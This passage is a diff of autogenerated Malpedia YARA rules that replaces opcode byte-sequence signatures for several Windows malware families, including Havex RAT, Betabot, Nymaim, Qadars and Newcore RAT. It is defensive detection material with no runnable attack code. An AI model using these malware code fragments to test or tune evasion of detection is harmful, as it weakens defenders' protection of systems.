-		$sequence_12 = { 8d4801 894e0c 0fb65001 80fa5f 0f94c3 }
-		$sequence_13 = { 01bdacf7ffff 83c40c 83bdc8f7ffff00 8b95c8f7ffff }
-		$sequence_14 = { 8d4801 890d???????? 8d8402199951bd dd8500f9ffff }
-		$sequence_15 = { 8d4801 8d8402ec432105 3d182b4547 890d???????? }
-		$sequence_16 = { 01d7 68???????? 57 e8???????? }
-		$sequence_17 = { 8d4801 83c601 39fe 898b00010000 }
-		$sequence_18 = { 8d4801 83c601 81fe???????? 898b00010000 }
-		$sequence_19 = { 01c9 4a 79f2 833b54 }
-		$sequence_20 = { 01d8 3b85b0f7ffff 7e2f 8b95c8f7ffff }
-		$sequence_21 = { 019dacf7ffff 83c40c 299dc4f7ffff e9???????? }
+		$sequence_0 = { 83c40c 8d4c2404 6a00 51 ffd6 6a00 }
+		$sequence_1 = { 8bc8 83e01f c1f905 8b0c8d607e4000 8a44c104 83e040 }
+		$sequence_2 = { 8b0c8d607e4000 8a44c104 83e040 c3 a1???????? }
+		$sequence_3 = { bf???????? f3ab 8d3452 895dfc c1e604 aa 8d9ec8674000 }
+		$sequence_4 = { 80e920 ebe0 80a0206c400000 40 3bc6 72be 5e }
+		$sequence_5 = { 8db6bc674000 bf???????? a5 a5 59 a3???????? }
+		$sequence_6 = { 8a8094504000 83e00f eb02 33c0 0fbe84c6b4504000 }
+		$sequence_7 = { c1f804 83f807 8945d0 0f879a060000 ff2485271a4000 834df0ff }
+		$sequence_8 = { 5e 8d0c8dc8614000 3bc1 7304 3910 7402 }
+		$sequence_9 = { ff15???????? 8bf0 68???????? 8d442408 68???????? 50 }
 
 	condition:
-		7 of them and filesize < 1875968
+		7 of them and filesize < 65272
 }
-rule MALPEDIA_Win_Simplefilemover_Auto : FILE
+rule MALPEDIA_Win_Newcore_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "14bdd8f8-6142-5a38-9205-708716e93989"
+		id = "1da70a7f-a318-54ce-916c-cf7245c92f4f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.simplefilemover"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.simplefilemover_auto.yar#L1-L222"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.newcore_rat_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "6035737199462cdcfa6d56d9e4b447822bb430a938cb907f7ba0f0edbb7456df"
+		logic_hash = "4e9038b9cb3dfc5a1f725a1c7c7f2099a8bbce01f729092f2f2495b7d4912fe0"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -110393,44 +110550,32 @@ rule MALPEDIA_Win_Simplefilemover_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bfc f3a5 e8???????? 81c420020000 }
-		$sequence_1 = { 7d07 33c0 e9???????? 6820020000 }
-		$sequence_2 = { e8???????? 81c420020000 85c0 7407 68???????? eb05 68???????? }
-		$sequence_3 = { b988000000 8bf3 8bfc f3a5 }
-		$sequence_4 = { ffd6 8bf8 3bfb 7462 }
-		$sequence_5 = { 59 8d45e8 59 53 50 }
-		$sequence_6 = { 51 ff15???????? 6a00 6800200000 8d9554daffff 52 8b8554faffff }
-		$sequence_7 = { 5f 889000010000 888801010000 5e 83c410 }
-		$sequence_8 = { 750f c78508daffff00000000 e9???????? 6a04 8d8d54daffff }
-		$sequence_9 = { ebc0 ebbe ebbc ebba ebb8 ebb6 5f }
-		$sequence_10 = { 6a00 8b8508daffff 2b85fcd9ffff 50 8b8d04daffff }
-		$sequence_11 = { f7ff 0fb6c2 8945f0 03c1 8855ff 8a10 88140e }
-		$sequence_12 = { 8b74241c 57 8a8800010000 8a9001010000 33ff 884c2408 }
-		$sequence_13 = { 85c0 7407 33c0 e9???????? 6a00 6a01 6a02 }
-		$sequence_14 = { 85f6 7417 8b4c2414 8d447b02 50 }
-		$sequence_15 = { 8a9001010000 33ff 884c2408 3bf7 88542424 897c2410 }
-		$sequence_16 = { 8b5c2408 56 57 668b03 33d2 33f6 33ff }
-		$sequence_17 = { 8b4c2410 81e1ff000000 8a1c01 885c241c }
-		$sequence_18 = { 83c10c 51 8d9554daffff 52 e8???????? 83c408 6a00 }
-		$sequence_19 = { 3bf8 7426 8d4dd4 53 51 8bcf 2bc8 }
-		$sequence_20 = { 3bfb 0f8c54ffffff 8a4c242c 5d 5b }
-		$sequence_21 = { 42 6685c0 75ea 85f6 }
+		$sequence_0 = { 0f841b010000 8b4c2418 03c8 03f8 2bd8 3b4c241c }
+		$sequence_1 = { 85c0 7534 8d442414 50 8d4c241c e8???????? }
+		$sequence_2 = { e8???????? 83c414 ebc9 8bc8 c1f905 8d1c8dc0cd0310 8bf0 }
+		$sequence_3 = { 68???????? 8d96f6010000 e8???????? 8b442434 8b4c2438 }
+		$sequence_4 = { 8d54242c 52 8d4c2418 8984245c020000 e8???????? 8d44242c }
+		$sequence_5 = { 5d 5b c3 8b8e58300000 03c0 03c0 898678300000 }
+		$sequence_6 = { 80c130 83e20f 884804 8bca 83f909 7e05 }
+		$sequence_7 = { 8984245c020000 e8???????? 8d44242c 50 8d742444 e8???????? 8b00 }
+		$sequence_8 = { ff15???????? 57 8bf0 53 56 ff15???????? 56 }
+		$sequence_9 = { 8bb42450020000 8bd8 8b442418 50 6a32 8d7b34 b904010000 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 581632
 }
-rule MALPEDIA_Win_Qadars_Auto : FILE
+rule MALPEDIA_Win_Redyms_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0a2bf787-2e79-532d-b549-325462dde16c"
+		id = "caf709b7-19ee-5a38-9403-a27d78973c28"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.qadars_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redyms_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "1b2a593b94764cfdb9793ab67d53c7287007841a19e7fe336bf33e3d401fbe52"
+		logic_hash = "b27b96ec2fba623283604654291a288582fbe387215c7c411815fe1fd821aa0e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110444,40 +110589,34 @@ rule MALPEDIA_Win_Qadars_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 eb05 8b11 8b0482 8bce 83e11f }
-		$sequence_1 = { 891481 40 3b4608 72f2 8b06 50 e8???????? }
-		$sequence_2 = { 75f8 8b07 50 e8???????? 57 e8???????? 83c408 }
-		$sequence_3 = { 57 c1e805 83e11f 33ff }
-		$sequence_4 = { 5e 5b c3 85f6 7427 8b4604 85c0 }
-		$sequence_5 = { 8b4114 2b410c 5f 03c6 03450c }
-		$sequence_6 = { 837e0c00 7405 015e0c eb31 85f6 742d }
-		$sequence_7 = { 0fb64d0c 8345fc03 8bd1 c1ea02 0fb6841578ffffff 0fb6550d 8807 }
-		$sequence_8 = { 6a00 8d4df4 51 6a04 8d55f8 }
-		$sequence_9 = { 6a01 6a08 ff15???????? 83c408 }
-		$sequence_10 = { 6a01 8b55fc 52 ff15???????? 83c408 }
-		$sequence_11 = { 83c40c 6805010000 8d8df8feffff 51 }
-		$sequence_12 = { 51 8b55f0 52 ff15???????? 83c40c }
-		$sequence_13 = { 83c408 83c001 8985c8fcffff 8d95f0feffff 8995c4fcffff }
-		$sequence_14 = { 83c408 83f801 0f85a5000000 6a00 }
-		$sequence_15 = { 83c408 83c8ff e9???????? eb1d 8b4d10 }
+		$sequence_0 = { 85c0 7414 8b4f04 57 }
+		$sequence_1 = { ffd6 57 ff15???????? 0fb6450b f7d8 5f 1bc0 }
+		$sequence_2 = { 2bc2 68???????? 6a03 b9???????? 8bd7 e8???????? 83c408 }
+		$sequence_3 = { 84c0 7467 807dfb00 7561 8b5514 }
+		$sequence_4 = { 8bf0 83c404 85f6 740e e8???????? 84c0 7405 }
+		$sequence_5 = { 55 8bec 83ec1c 8845f4 8b4508 8d5001 90 }
+		$sequence_6 = { 898534feffff 85c0 745d 8dbd70ffffff b806000000 e8???????? 53 }
+		$sequence_7 = { 8975f4 895df8 ff15???????? 8bf8 }
+		$sequence_8 = { 7409 53 57 56 ff15???????? 8975d4 eb22 }
+		$sequence_9 = { 0f84b2000000 8d7ddc b825000000 e8???????? 8b4dd0 8b55d4 a1???????? }
 
 	condition:
-		7 of them and filesize < 630784
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Korlia_Auto : FILE
+rule MALPEDIA_Win_Tinytyphon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f4183d87-ea91-5bb4-a600-f9953387c71f"
+		id = "5b03e241-fb6f-559b-bde6-deb493402fa5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.korlia_auto.yar#L1-L479"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinytyphon_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "05ee31919c5d4bc6056f376629b9d7ad98c63e5082d49653926cef5a9130bcaf"
+		logic_hash = "f9788ed24c5ff9be6cbd5ec91e29693ea290ace26342cc375a5a9e76cbe49f63"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -110489,74 +110628,32 @@ rule MALPEDIA_Win_Korlia_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81fb68584d56 0f9445e4 5b 59 5a c745fcffffffff 8a45e4 }
-		$sequence_1 = { c1fa0e 8bc2 c1e81f 03d0 52 68???????? 51 }
-		$sequence_2 = { 68???????? 51 ffd6 8bc7 b980ee3600 99 }
-		$sequence_3 = { 8bc7 b9005c2605 99 f7f9 }
-		$sequence_4 = { ff15???????? 8bf8 b83bd4b531 f7ef }
-		$sequence_5 = { 68???????? 68???????? ffd6 b905000000 be???????? }
-		$sequence_6 = { c3 85db 7410 6a28 68???????? 6aff }
-		$sequence_7 = { 83ec0c 53 56 57 8965e8 c645e401 c745fc00000000 }
-		$sequence_8 = { 6a01 53 53 53 51 ff15???????? 85c0 }
-		$sequence_9 = { 8b442404 56 6a00 6a00 6a01 6a00 6a00 }
-		$sequence_10 = { 6a01 6a00 6a00 6800000040 50 ff15???????? 8bf0 }
-		$sequence_11 = { 8bf0 83feff 7423 8b542410 8b44240c 8d4c2408 6a00 }
-		$sequence_12 = { e8???????? 8a4c2404 6a01 884814 }
-		$sequence_13 = { 59 59 c3 8b65e8 ff7588 ff15???????? 833d????????ff }
-		$sequence_14 = { 898840200000 58 c20800 e9???????? 6800060000 6a00 e8???????? }
-		$sequence_15 = { ff7588 ff15???????? 833d????????ff 750c ff742404 ff15???????? 59 }
-		$sequence_16 = { 50 56 ff15???????? 56 ff15???????? b001 }
-		$sequence_17 = { ff742410 ff742410 ff742410 e8???????? c21000 e8???????? 8a4c2404 }
-		$sequence_18 = { 8bf9 81e7ff000000 03f2 03f7 }
-		$sequence_19 = { 8d442444 894d00 8b542438 83c504 }
-		$sequence_20 = { 680030c800 6a00 6a00 68???????? }
-		$sequence_21 = { 8b542438 83c504 50 895500 }
-		$sequence_22 = { b8447c0000 e8???????? 53 56 }
-		$sequence_23 = { 6a00 6880000000 6800000400 8bce }
-		$sequence_24 = { 6a00 6a00 6a00 50 8bce e8???????? 6a00 }
-		$sequence_25 = { 51 ff15???????? a1???????? b981000000 }
-		$sequence_26 = { 85c0 750c ff15???????? 53 e9???????? }
-		$sequence_27 = { ffd6 8d44240c 6804010000 50 }
-		$sequence_28 = { 50 ffd6 eb06 8b35???????? a1???????? }
-		$sequence_29 = { 68ff0f1f00 ff15???????? 85c0 740a }
-		$sequence_30 = { e8???????? 6a00 6a00 8d542414 6a00 52 }
-		$sequence_31 = { 7403 50 ffd6 b912010000 33c0 }
-		$sequence_32 = { 8d4c2410 6804010000 51 aa ff15???????? bf???????? 83c9ff }
-		$sequence_33 = { 6a00 68???????? 6801000080 ff15???????? 85c0 0f8599000000 }
-		$sequence_34 = { 8d442400 50 6806000200 6a00 }
-		$sequence_35 = { 85c0 740a 56 50 ff15???????? 8bf0 }
-		$sequence_36 = { 8b4c2410 50 6a01 6a00 68???????? 51 }
-		$sequence_37 = { 3bc3 57 740b 8b35???????? 50 }
-		$sequence_38 = { 8b35???????? a1???????? 3bc3 7403 50 }
-		$sequence_39 = { 8d7c2411 88442410 f3ab 66ab 8d4c2410 6804010000 }
-		$sequence_40 = { 33c0 8dbc245e020000 66899c245c020000 f3ab }
-		$sequence_41 = { 68003e0000 f2ae f7d1 2bf9 68???????? }
-		$sequence_42 = { e8???????? 83c414 8d8424e0050000 50 }
-		$sequence_43 = { 8d85f4edffff 6a08 ffb5f0edffff 50 e8???????? }
-		$sequence_44 = { 56 57 b97c000000 33c0 8dbdd1fbffff c685d0fbffff00 8965f0 }
-		$sequence_45 = { 55 8b2d???????? 56 57 33db b90c000000 33c0 }
-		$sequence_46 = { 68???????? 52 c745cc0c714000 e8???????? 8d45c8 8d8dc4fdffff 50 }
-		$sequence_47 = { e9???????? e8???????? 99 b970170000 f7f9 81c2983a0000 }
-		$sequence_48 = { 8db5d4f2ffff 8dbdc8f0ffff 6a00 f3a5 50 }
-		$sequence_49 = { 899c2458040000 e8???????? 8d8c24582c0000 50 51 e8???????? }
-		$sequence_50 = { 8d4dfc 0345fc 51 8b4df4 51 }
-		$sequence_51 = { 8d4510 6a04 50 8b4608 6a1f 53 ffd0 }
+		$sequence_0 = { ff15???????? ebea 6a00 6a00 8d95f8feffff }
+		$sequence_1 = { 8955f0 8d45d8 50 ff15???????? 8945d0 8b4df0 3b4dd0 }
+		$sequence_2 = { 034160 8b55dc 8d8402bbd2d72a 8945dc }
+		$sequence_3 = { 6a13 8b85e8feffff 50 ff15???????? 85c0 7544 }
+		$sequence_4 = { c1e108 0bd1 8b45f4 0fb6480e c1e110 0bd1 8b45f4 }
+		$sequence_5 = { 668955fc 33c0 668945fc eb0c 668b4dfc 6683c101 66894dfc }
+		$sequence_6 = { 8b5508 034a78 8b45e0 8d8c0881f67187 894de0 8b55e0 }
+		$sequence_7 = { 034160 8b55e4 8d84026556acc4 8945e4 8b4de4 c1e117 8b55e4 }
+		$sequence_8 = { 034de4 894df8 8b55f4 0fb64204 8b4df4 0fb65105 c1e208 }
+		$sequence_9 = { 8b4de4 c1e116 8b55e4 c1ea0a 0bca 894de4 8b45e4 }
 
 	condition:
-		7 of them and filesize < 263168
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Jasus_Auto : FILE
+rule MALPEDIA_Win_Mofksys_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e40f0cf2-c464-539f-a5ee-e734bdbeed88"
+		id = "5b460e3c-29c6-5db2-a32f-e1a99c684da5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jasus_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mofksys_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "2c691c8874b1ab7be876ba59aead20405103b0885bc9bec7a0a38d9442642c23"
+		logic_hash = "8c9a7d93274bbf5d514b6dd91aa6e0270b7fa1be2a34ea8caa7a062178ba1dc3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110570,32 +110667,32 @@ rule MALPEDIA_Win_Jasus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 668b5304 83ec08 8bc4 8930 66897804 83ec08 8bc4 }
-		$sequence_1 = { 52 ff15???????? 8b4608 50 68???????? e8???????? 68???????? }
-		$sequence_2 = { 41 ebf3 68???????? 51 894dec 894de8 e8???????? }
-		$sequence_3 = { 81e7ff000000 894e04 3304bda0ca4100 8bf8 8b442418 }
-		$sequence_4 = { 6a07 c1f804 59 8985a4fbffff 3bc1 0f87260a0000 ff248514274100 }
-		$sequence_5 = { 668b1d???????? 898d78ffffff 668b0d???????? 899564ffffff 8b15???????? 66898d68ffffff 89957cffffff }
-		$sequence_6 = { 50 68???????? 51 e8???????? 8b9dccfaffff 83c418 32c9 }
-		$sequence_7 = { 56 8b7508 8bc6 c1f805 8d1485809d4300 8b0a 83e61f }
-		$sequence_8 = { 51 8d5580 52 8d857cffffff 50 8d8d78ffffff }
-		$sequence_9 = { 833d????????00 0fb75708 8b4f04 8b07 66899568feffff 0fb715???????? 898d64feffff }
+		$sequence_0 = { 6a1c 68???????? 8b5588 52 8b4584 50 ff15???????? }
+		$sequence_1 = { 56 ff5004 897de0 897ddc 897dd8 6a01 ff15???????? }
+		$sequence_2 = { ff15???????? 8b8d5cffffff 89412c c745fc86000000 8d55d4 52 6a00 }
+		$sequence_3 = { ff15???????? 33c9 837db400 0f95c1 f7d9 66894db0 8d4dc8 }
+		$sequence_4 = { 8b4de0 ff15???????? 50 ff15???????? c785f4fcffff00000000 ff15???????? }
+		$sequence_5 = { 8d4dc4 51 8b35???????? ffd6 50 57 }
+		$sequence_6 = { 8b4dd4 51 8d55dc 52 ff15???????? 8d45cc 50 }
+		$sequence_7 = { ff15???????? 8b4dd0 8b8530ffffff c1e002 eb09 ff15???????? 8b4dd0 }
+		$sequence_8 = { 6685f6 7413 668b0d???????? 51 ff15???????? e9???????? 668b15???????? }
+		$sequence_9 = { 8b5508 8b02 eb3a 8b4dd0 85c9 7424 66833901 }
 
 	condition:
-		7 of them and filesize < 507904
+		7 of them and filesize < 401408
 }
-rule MALPEDIA_Win_Havex_Rat_Auto : FILE
+rule MALPEDIA_Win_Betabot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "62ba2091-3094-511c-928f-d8587303cab0"
+		id = "76d74828-4d3c-5b24-a19d-5dd4164ed17c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.havex_rat_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.betabot_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "051d7a160bda27ce92537b0acc638ab1e006b209a8b64890cf910d9cca719a54"
+		logic_hash = "07dd0ba00e2d3513e1cad1cf2b7d11e94e25b4a1985b335a6dca6b1199e5355b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110609,34 +110706,34 @@ rule MALPEDIA_Win_Havex_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff4dc8 8d4701 8906 83ee04 837dc800 7dcd }
-		$sequence_1 = { e8???????? 33ff 895dfc 47 68???????? 8d8d6cffffff }
-		$sequence_2 = { c74128e41b0510 c7413c901b0510 e8???????? 5e c3 8d4e28 c706???????? }
-		$sequence_3 = { ff750c ff7508 50 8b4510 e8???????? 83c414 c9 }
-		$sequence_4 = { ff4dd8 8945ec 8b4dec c7430428000000 eb37 8b03 83780400 }
-		$sequence_5 = { 68???????? 8d8da8f7ffff e8???????? c645fc03 eb98 8d85c4f7ffff }
-		$sequence_6 = { 83c040 50 e8???????? 83c414 8b8d84010000 5f 33cd }
-		$sequence_7 = { 56 8bf0 837e1808 57 7205 8b4604 eb03 }
-		$sequence_8 = { 039798c90000 8b7ddc 0fb77c7b3c 897de0 81c7990c0000 c1e704 030437 }
-		$sequence_9 = { ffd6 83f801 74f3 6a01 ffd5 53 }
+		$sequence_0 = { ff15???????? ff15???????? 89859cfcffff 83a594fcffff00 eb0d 8b8594fcffff 40 }
+		$sequence_1 = { 663901 7408 6a02 58 e9???????? a1???????? 3bc3 }
+		$sequence_2 = { 7507 32c0 e9???????? 0591f4ffff 50 56 ff15???????? }
+		$sequence_3 = { 84d2 7905 884613 eb08 f6c240 7403 }
+		$sequence_4 = { 8d85c0fcffff 50 8d85f8feffff 50 8d85d0fdffff 50 8b85a4fcffff }
+		$sequence_5 = { 8bec 81ec44020000 f605????????80 7405 33c0 }
+		$sequence_6 = { 894610 895e14 898e18010000 85c0 7426 3dffff0000 731f }
+		$sequence_7 = { a1???????? f6401280 7405 6a02 58 c9 c3 }
+		$sequence_8 = { 50 57 e8???????? 56 8d45f0 50 ff7510 }
+		$sequence_9 = { e8???????? eb12 a1???????? 85c0 740b 8d4dfc }
 
 	condition:
-		7 of them and filesize < 892928
+		7 of them and filesize < 835584
 }
-rule MALPEDIA_Win_Satellite_Turla_Auto : FILE
+rule MALPEDIA_Win_Nymaim_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "021a1167-58db-5ce8-8597-0f62f23fcc56"
+		id = "e0a12b6e-526a-5a8b-aed4-baed5127be87"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.satellite_turla_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nymaim_auto.yar#L1-L222"
 		license_url = "N/A"
-		logic_hash = "e5dfd974166d3696682fe85d3bf761357a2cf777cf6c86d583494170169c67ee"
+		logic_hash = "f3d2f3296acd118f28135509a78d3821be2bc056e67d24571caf444a5d1f55ba"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -110648,38 +110745,46 @@ rule MALPEDIA_Win_Satellite_Turla_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0105???????? 81c3b0020000 2945e0 75ae 837dd400 }
-		$sequence_1 = { 0105???????? 83c410 29442418 75a9 }
-		$sequence_2 = { 0105???????? 83c410 29442420 75aa }
-		$sequence_3 = { 0108 833a00 7c23 8b442428 }
-		$sequence_4 = { 0108 833e00 7fc7 db46fc }
-		$sequence_5 = { 0108 833e00 7c1f 8b542410 }
-		$sequence_6 = { 0108 833e00 7cc7 7e39 }
-		$sequence_7 = { 51 8d9514fbffff 52 a1???????? 50 ff15???????? 3bc3 }
-		$sequence_8 = { c6459d1f c6459e19 c6459f02 c645a009 c645a11e c645a21f c645a30e }
-		$sequence_9 = { 6a0c 50 c645d036 c645d114 }
-		$sequence_10 = { ff15???????? 85c0 0f8400010000 895dfc }
-		$sequence_11 = { 8d85f0feffff 6a5c 50 e8???????? 59 885801 }
-		$sequence_12 = { 57 ff15???????? ff75f8 e8???????? 59 33c0 }
-		$sequence_13 = { 57 ffd6 a3???????? 6a28 8d45dc }
-		$sequence_14 = { ffd7 8d85f0feffff 50 56 }
-		$sequence_15 = { c645b62b c645b72b e8???????? 83c40c 8d45a8 885db7 50 }
+		$sequence_0 = { 89d8 01c8 31d2 f7f7 }
+		$sequence_1 = { 31d2 f7f7 92 31d2 bf64000000 }
+		$sequence_2 = { 0f94c1 09c8 6bc064 09c0 }
+		$sequence_3 = { 38f0 83d100 38d0 83d900 c1e105 }
+		$sequence_4 = { c1e105 01c8 c1c307 30c3 }
+		$sequence_5 = { c1e902 83f900 7405 01d3 }
+		$sequence_6 = { c1e902 740d 8b06 8907 83c704 }
+		$sequence_7 = { c1eb13 331d???????? 31c3 c1e808 }
+		$sequence_8 = { 31d2 bf64000000 f7f7 5b }
+		$sequence_9 = { 010d???????? 8b1d???????? 011d???????? c1eb13 }
+		$sequence_10 = { 00d3 8a16 301e 46 }
+		$sequence_11 = { c1e808 31c3 895e0c 89d8 }
+		$sequence_12 = { 8b5604 0116 8b4e08 014e04 8b5e0c 015e08 }
+		$sequence_13 = { 8b06 c1e00b 3306 8b5604 }
+		$sequence_14 = { 8b1b 4f 31c0 fec2 021c16 8a0416 }
+		$sequence_15 = { 8b12 8b4d0c 8b5d18 8b1b 4f 31c0 }
+		$sequence_16 = { 31d2 890c24 c744240400000000 8945f4 8955f0 e8???????? 8d0d8630d201 }
+		$sequence_17 = { 5b 5d c3 8b45f0 8b0c850440d201 }
+		$sequence_18 = { 56 83ec28 8b450c 8b4d08 8d154e30d201 }
+		$sequence_19 = { 31c9 8b55f4 8b75ec 89723c c7424003000000 }
+		$sequence_20 = { 83ec44 8b4508 8d0d2030d201 31d2 890c24 c744240400000000 }
+		$sequence_21 = { 55 89e5 83ec10 8b4508 8d0d3430d201 }
+		$sequence_22 = { 53 56 57 83ec44 8b4508 8d0d2030d201 }
+		$sequence_23 = { 890424 894c2404 e8???????? 8d0d3430d201 }
 
 	condition:
-		7 of them and filesize < 1040384
+		1 of them and filesize < 2375680
 }
-rule MALPEDIA_Win_Unidentified_076_Auto : FILE
+rule MALPEDIA_Win_Stration_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c83626b-47ce-55ce-a381-007bcb7e73d5"
+		id = "a114ca5f-e8f5-5b6c-8d4b-c8b226c24232"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_076_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stration_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "92802d8a51aa29b7bc92df361f52f4a28a9ddff1846405226196ebfa4afe53d1"
+		logic_hash = "810e080388d75ad01155fee822907ac9d5b404fa94d6259fc807c41db11a9cc8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110693,32 +110798,32 @@ rule MALPEDIA_Win_Unidentified_076_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f95c3 488b6c2438 488b742440 488b7c2448 8bc3 488b5c2430 4883c420 }
-		$sequence_1 = { 448bc3 49894628 488b87c8000000 8bd5 488b4810 49894e18 }
-		$sequence_2 = { ff97f8000000 488bd8 4885c0 7508 418bf4 e9???????? }
-		$sequence_3 = { 488b87c8000000 33d2 488bce 448d4230 ff9020070000 488b87c8000000 }
-		$sequence_4 = { e9???????? 8b473c 33c9 394764 8d5101 0f43ca 4533e4 }
-		$sequence_5 = { 488b8bb00a0000 4885c9 7413 4c8b83c8000000 ba02000000 41ff90f0040000 488b93c8000000 }
-		$sequence_6 = { 488bcf 03c0 41898638040000 e8???????? 498d962c010000 488bcf e8???????? }
-		$sequence_7 = { 85c0 7e29 803c313b 740c 48ffc1 ffc2 }
-		$sequence_8 = { 488b8790000000 49891c24 498d5640 4989442408 488b8790000000 498d4c2440 }
-		$sequence_9 = { 4885c9 7415 488b8308010000 33d2 41b800800000 ff9000010000 4889bbe0000000 }
+		$sequence_0 = { 57 8d54240c 52 33f6 56 8d442418 50 }
+		$sequence_1 = { a1???????? 80f253 83ec24 85c0 8815???????? }
+		$sequence_2 = { c744241000000000 eb0c 8a0d???????? 880d???????? 6a01 56 }
+		$sequence_3 = { 52 e8???????? a3???????? 8b4c2420 51 }
+		$sequence_4 = { ba11010000 8bce e8???????? c705????????00000000 }
+		$sequence_5 = { 8b15???????? 89442404 a1???????? 894c2408 8a0d???????? 89442410 8954240c }
+		$sequence_6 = { 8bff 8a1404 8a4c240c 32d1 881404 40 83f80d }
+		$sequence_7 = { 8a1404 8a4c240c 32d1 881404 }
+		$sequence_8 = { 8d8c24b4000000 51 33f6 e8???????? }
+		$sequence_9 = { 83f825 7cec 8b3d???????? 68???????? }
 
 	condition:
